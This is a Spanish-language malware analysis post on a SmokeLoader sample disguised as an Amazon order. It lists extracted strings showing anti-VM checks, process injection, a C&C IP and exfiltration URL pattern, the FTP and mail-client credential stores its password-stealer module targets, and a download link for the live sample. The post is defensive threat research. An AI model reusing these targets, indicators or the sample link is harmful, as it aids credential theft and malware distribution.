Gracias a mi amigo Raul, hoy les traigo esta muestra de SmokeLoader que es distribuida como un falsa orden de compras de Amazon.com
Analisis en V.T.
Capa de un básico Cripter en Vbasic
Sin Crypter,
Strings interesantes
001E126C ASCII "&file=",0
001E1274 ASCII "&run=ok",0
001E127C ASCII "&run=fail",0
001E1288 ASCII "&sel=",0
001E1290 ASCII "&ver=",0
001E1298 ASCII "&bits=",0
001E12A0 ASCII "&doubles=1",0
001E12AC ASCII "&personal=ok",0
001E12BC ASCII "&removed=ok",0
001E12C8 ASCII "&admin=",0
001E12D0 ASCII "&hash=",0
001E12D8 ASCII "&r=",0
001E12DC ASCII "Software",0
001E2798 ASCII "svchost.exe",0
001E2998 SUB EAX,Smoke.001E2740 ASCII "`è$"
001E2AB6 PUSH Smoke.001E2E3C ASCII "Shell_TrayWnd"
001E2C03 PUSH Smoke.001E2E4C ASCII "s2k14"
001E2C69 PUSH Smoke.001E2E4C ASCII "s2k14"
001E2D36 PUSH Smoke.001E2E54 ASCII "svchost.exe"
001E2E86 PUSH 0x10000 UNICODE "=::=::\"
001E35E2 PUSH Smoke.001E3A14 ASCII "System"
001E38CC PUSH Smoke.001E3A1C ASCII "advapi32.dll"
001E38DC PUSH Smoke.001E3A1C ASCII "advapi32.dll"
001E39A8 PUSH Smoke.001E3A1C ASCII "advapi32.dll"
001E3A14 ASCII "System",0
001E3A1C ASCII "advapi32.dll",0
001E3A5D MOV EDX,Smoke.001E3D90 ASCII "Location:"
001E3D90 ASCII "Location:",0
001E3E1F MOV EDX,Smoke.001E424C ASCII "Smk"
001E3E5E MOV EDX,Smoke.001E4250 ASCII "plugin_size"
001E3E9C MOV EDX,Smoke.001E425C ASCII "|:|"
001E3EED PUSH 0xFA000 UNICODE "september"
001E3FBB PUSH Smoke.001E4260 ASCII "advapi32.dll"
001E3FCB PUSH Smoke.001E4260 ASCII "advapi32.dll"
001E4019 PUSH Smoke.001E4270 ASCII "%s%s%c"
001E4084 PUSH Smoke.001E4278 ASCII "%s%s"
001E4137 PUSH Smoke.001E4278 ASCII "%s%s"
001E41C0 PUSH Smoke.001E4280 ASCII "%s%s%d"
001E424C ASCII "Smk",0
001E4478 ASCII "%s%s%s%s%s",0
001E4586 MOV EDX,Smoke.001E45E4 ASCII "Work"
001E45E4 ASCII "Work",0
001E464A PUSH 0xFA000 UNICODE "september"
001E4792 PUSH Smoke.001E4858 ASCII "FF"
001E479C PUSH Smoke.001E485C ASCII "%s%s"
001E47E5 PUSH Smoke.001E4864 ASCII "%s%s%s"
001E4858 ASCII "FF",0
001E485C ASCII "%s%s",0
001E4864 ASCII "%s%s%s",0
001E489F MOV EDX,Smoke.001E49E4 ASCII "sample"
001E48CC PUSH Smoke.001E49EC ASCII "C:\"
001E4919 PUSH Smoke.001E49F0 ASCII "System\CurrentControlSet\Services\Disk\Enum"
001E5088 DD Smoke.001E1024 UNICODE "%s\%s"
001E508C DD Smoke.001E1030 UNICODE "%s%s"
001E5090 DD Smoke.001E103C UNICODE "regsvr32 /s %s"
001E5094 DD Smoke.001E105C UNICODE "%s\%s.lnk"
001E5098 DD Smoke.001E1070 UNICODE "%APPDATA%"
001E509C DD Smoke.001E1084 UNICODE "%TEMP%"
001E50A0 DD Smoke.001E1094 UNICODE ".exe"
001E50A4 DD Smoke.001E10A0 UNICODE ".dll"
001E50A8 DD Smoke.001E10AC UNICODE "/c start %s && exit"
001E50AC DD Smoke.001E10D4 ASCII "user32"
001E50B0 DD Smoke.001E10DC ASCII "shell32"
001E50B4 DD Smoke.001E10E4 ASCII "advapi32"
001E50B8 DD Smoke.001E10F0 ASCII "crypt32"
001E50BC DD Smoke.001E10F8 ASCII "ws2_32"
001E50C0 DD Smoke.001E1100 ASCII "urlmon"
001E50C4 DD Smoke.001E1108 ASCII "ole32"
001E50C8 DD Smoke.001E1110 ASCII "HelpLink"
001E50CC DD Smoke.001E111C ASCII "URLInfoAbout"
001E50D0 DD Smoke.001E112C ASCII "sbiedll"
001E50D4 DD Smoke.001E1134 ASCII "dbghelp"
001E50D8 DD Smoke.001E113C ASCII "qemu"
001E50DC DD Smoke.001E1144 ASCII "virtual"
001E50E0 DD Smoke.001E114C ASCII "vmware"
001E50E4 DD Smoke.001E1154 ASCII "xen"
001E50E8 DD Smoke.001E1158 ASCII ":Zone.Identifier"
001E50EC DD Smoke.001E116C ASCII "Mozilla/4.0"
001E50F0 DD Smoke.001E1178 ASCII "cmd=getload&login="
001E50F4 DD Smoke.001E118C ASCII "http://www.msn.com/"
001E50F8 DD Smoke.001E11A0 ASCII "GET /%s HTTP/1.1
Esta amenaza se inyecta en un proceso svchost.exe
001E2798 ASCII "svchost.exe",0
Tiene protección de ejecución en maquina virtuales
001E50D8 DD Smoke.001E113C ASCII "qemu"
001E50DC DD Smoke.001E1144 ASCII "virtual"
001E50E0 DD Smoke.001E114C ASCII "vmware"
001E50E4 DD Smoke.001E1154 ASCII "xen"
Reporte al C&C
"cmd=getload&login="
En la prueba dinámica, el bot descarga otro modulo ejecutable encargado del robo de información sensible de la victima (Password Stealer)
Analisis en V.T.
No contiene capa de ofuscación.
Strings:
Text string
ASCII "===="
ASCII "software\microsoft\windows\currentversion"
ASCII "VendorId"
ASCII "rpcrt4.dll"
ASCII "UuidCreate"
ASCII "software\microsoft\windows\currentversion"
ASCII "VendorId"
ASCII "GetProcAddress"
UNICODE "=::=::\"
ASCII "Mozilla 4.0"
ASCII "Accept: text/html,application/xhtml+xml,applicati
ASCII "gzip"
(Initial CPU selection)
ASCII "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.
ASCII "93.113.37.210"
ASCII "http://%s"
ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
ASCII "regedit32"
ASCII "93.113.37.210"
ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Pa
ASCII "%s:*:Enabled:Microsoft Office"
ASCII "5629186B-0207-4659-AE5D-B09282932A86"
ASCII "%s_%d"
ASCII "%s_%d"
ASCII "0123456789ABCDEFabcdef"
ASCII "0123456789ABCDEFabcdef"
ASCII "0123456789ABCDEFabcdef"
ASCII "0123456789ABCDEFabcdef"
ASCII "\..\Local\VirtualStore"
ASCII "\*.*"
UNICODE "text"
UNICODE "gzip"
ASCII "HTTP/1.1"
ASCII "
ASCII "Content-Encoding: gzip"
ASCII "Content-Length:"
ASCII "Transfer-Encoding: chunked"
ASCII "93.113.37.210"
UNICODE "=::=::\"
ASCII "bhappyland.com"
ASCII "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
ASCII "index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ft
ASCII "SUCCESS"
ASCII "
UNICODE "=::=::\"
ASCII "93.113.37.210"
ASCII "%08X-%04X-%04X-%02X%02X%02X%02X%02X%02X%02X%02X"
ASCII "93.113.37.210"
UNICODE "=::=::\"
ASCII "93.113.37.210"
ASCII "===="
ASCII "WABOpen"
UNICODE "::=::\"
ASCII "Software\Microsoft\WAB\DLLPath"
ASCII "Identities"
ASCII "Identities"
ASCII "Microsoft\Outlook Express"
ASCII "*.dbx"
UNICODE "::=::\"
ASCII "SOFTWARE\Clients\Mail"
ASCII "Microsoft Outlook"
ASCII "Microsoft Outlook"
ASCII "SOFTWARE\Clients\Mail\Microsoft Outlook"
ASCII ".."
ASCII "MSWQ*.tmp"
ASCII "MSWQ*.tmp"
ASCII ".rar"
ASCII ".zip"
ASCII ".cab"
ASCII ".avi"
ASCII ".mp3"
ASCII ".jpg"
ASCII ".gif"
ASCII "10"
ASCII "11"
ASCII "12"
ASCII "13"
ASCII "14"
ASCII "%s:%s:%s:%s"
ASCII "Config Path"
ASCII "Software\VanDyke\SecureFX"
ASCII "\Sessions"
ASCII "\*.ini"
ASCII "\*.*"
ASCII "Username"
ASCII "Hostname"
ASCII "Password"
ASCII "Software\FTPWare\CoreFTP\Sites"
ASCII "PW"
ASCII "User"
ASCII "Host"
ASCII "hdfzpysvpzimorhk"
ASCII "DataFolder"
ASCII "Software\FTPRush"
ASCII "RushSite.xml"
ASCII "Software\UltraFXP"
ASCII "Sites.xml"
ASCII "USER"
ASCII "HOST"
ASCII "PASS"
ASCII "Estsoft\ALFTP\ESTdb2.dat"
ASCII "Encrypt_PW"
ASCII "ID"
ASCII "URL"
ASCII "Software\Microsoft\Windows\CurrentVersion\Uninsta
ASCII "FTP Commander"
ASCII "FTP Navigator"
ASCII "InstallLocation"
ASCII "UninstallString"
ASCII "Ftplist.txt"
ASCII "User"
ASCII "Server"
ASCII "Password"
ASCII "Software\CoffeeCup Software\Internet\Profiles"
ASCII "Password"
ASCII "HostName"
ASCII "Username"
ASCII "%s\TurboFTP\addrbk.dat"
ASCII "%s:%s:%s:%s"
ASCII "%s:%s:%s:%s:%d"
ASCII "%s\SmartFTP\Client 2.0\Favorites"
ASCII "%s\*.xml"
ASCII "%s\%s"
ASCII "%s\*.*"
ASCII ".."
ASCII "%s\%s"
ASCII "
ASCII "
ASCII "
" ASCII "
ASCII "
ASCII "
" ASCII "
ASCII "
ASCII "
" ASCII "
ASCII "
ASCII "
" ASCII "%s:%s:%s:%s"
ASCII "%s:%s:%s:%s:%s"
ASCII "host"
ASCII "uid"
ASCII "pwd"
ASCII "software\ipswitch\ws_ftp"
ASCII "DataDir"
ASCII "%s\sites\ws_ftp.ini"
ASCII "wcx_ftp.ini"
ASCII "GHISLER"
ASCII "wcx_ftp.ini"
ASCII "Software\Ghisler"
ASCII "FtpIniName"
ASCII "Install_Dir"
ASCII "wcx_ftp.ini"
ASCII "InstallDir"
ASCII "wcx_ftp.ini"
ASCII "%d"
ASCII "connections"
ASCII "host"
ASCII "username"
ASCII "password"
ASCII "anonymous"
ASCII "e-mail"
ASCII "general"
ASCII "://"
ASCII "MS IE FTP Passwords"
ASCII "MS IE FTP Passwords"
ASCII "DPAPI: "
ASCII "acheCredentials"
ASCII "WininetCacheCredentials"
ASCII "pstorec.dll"
ASCII "crypt32.dll"
ASCII "PStoreCreateInstance"
ASCII "CryptUnprotectData"
ASCII "User"
ASCII "Host"
ASCII "Pass"
ASCII "Install_Dir"
ASCII "Software\FileZilla"
ASCII "FileZilla.xml"
ASCII "Server "
ASCII "Site "
ASCII "User"
ASCII "Host"
ASCII "Pass"
ASCII "Software\FileZilla"
ASCII "Last Server Pass"
ASCII "Last Server User"
ASCII "Last Server Host"
ASCII "Software\FileZilla\Site Manager"
ASCII "Pass"
ASCII "User"
ASCII "Host"
ASCII "\GlobalSCAPE"
ASCII "sm.*"
ASCII "8."
ASCII "Software\GlobalSCAPE\"
ASCII "Software\GlobalSCAPE\"
ASCII "\QCToolbar"
ASCII "QCHistory"
ASCII "%s\%s"
ASCII "HostName"
ASCII "User"
ASCII "Password"
ASCII "software\far\plugins\ftp\hosts"
ASCII "software\far2\plugins\ftp\hosts"
ASCII "Win32StopOffMutant"
ASCII "Win32StopOffMutant"
UNICODE "::\"
UNICODE "::\"
UNICODE "=::\"
UNICODE ":\"
UNICODE "=::=::\"
UNICODE "=::=::\"
ASCII "AUTH PLAIN"
ASCII "235"
ASCII "USER"
ASCII "PASS"
ASCII "230"
ASCII "USER"
ASCII "PASS"
ASCII "OK"
ASCII "LOGIN "
ASCII "%d.%d.%d.%d:%s:%s"
ASCII "%d:%s:%s:%d.%d.%d.%d"
ASCII "MAIL FROM:"
UNICODE ":=::\"
ASCII "RCPT TO:"
ASCII "
ASCII "NtQueryInformationProcess"
ASCII "ntdll"
ASCII "AllocateAndGetTcpExTableFromStack"
ASCII "iphlpapi.dll"
ASCII "AllocateAndGetUdpExTableFromStack"
ASCII "iphlpapi.dll"
ASCII "CreateToolhelp32Snapshot"
ASCII "kernel32.dll"
ASCII "Process32First"
ASCII "kernel32.dll"
ASCII "Process32Next"
ASCII "kernel32.dll"
Consola del C&C
Readme en Ruso del Bot encontrado en el servidor.
Nota interesante sobre este bot -> http://www.webroot.com/blog/2012/02/03/a-peek-inside-the-smoke-malware-loader/
Muestra:
https://mega.co.nz/#!9A1z2YpY!360jF2N2FbUFuss5vvNIDS-lX07nugOomLckduSPN7E
Eso es todo por el momento.
@Dkavalanche 2014